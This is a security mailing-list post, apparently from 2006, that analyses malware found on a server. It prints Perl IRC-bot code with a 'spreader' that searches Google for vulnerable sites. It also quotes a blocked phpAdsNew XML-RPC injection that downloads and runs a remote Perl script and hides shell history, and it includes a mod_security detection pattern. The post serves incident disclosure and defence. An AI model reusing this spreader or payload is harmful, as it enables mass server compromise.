sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx",
"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
-- cut --
It looks like it's connecting to an irc server specified in the configuration section. I've installed mod_security on
that machine to track this issue (I thought that it's a mambo/joomla clone) and this is a log from modsecurity :
-- cut --
==820d6169==============================
Request: www.example.com 64.18.150.130 - - [17/Aug/2006:07:56:41 +0100] "POST /banmanagerold/adxmlrpc.php HTTP/1.1" 403
428 "-" "Internet Explorer 6.0" ROQTKVBXgIIAAHf6FiI "-"
----------------------------------------
POST /banmanagerold/adxmlrpc.php HTTP/1.1
Connection: TE, close
Content-Length: 557
Host: www.example.com
TE: deflate,gzip;q=0.3
User-Agent: Internet Explorer 6.0
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match
"(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;"
at POST_PAYLOAD [id "300008"][rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]
557
<?xml
version="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>',''));
system('unset HISTFILE;cd /tmp;GET http://62.193.236.112/top > top;perl top;mv top
sess_2e04828799532f31e651238bda569ca7; wget http://62.193.236.112/top;perl top;mv top
sess_2e04828799532f31e651238bda569ca3'); die; /*</name></value></param></params></methodCall>
HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--820d6169--
-- cut --
/banmanagerold/adxmlrpc.php - it's a part of the phpAdsNew (Banner management software). Affected version that I found
on my server is : phpAdsNew 2.0.4-pr2
Kind regards,
Marek Kroemeke
------------------------------------------------------------------------------
This List Sponsored by: Black Hat
Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas.
World renowned security experts reveal tomorrow's threats today. Free of
vendor pitches, the Briefings are designed to be pragmatic regardless of your
security environment. Featuring 36 hands-on training courses and 10 conference
tracks, networking opportunities with over 2,500 delegates from 40+ nations.
http://www.blackhat.com
------------------------------------------------------------------------------
Current thread:
- Re: High volume of Mambo scans nixon (Aug 18)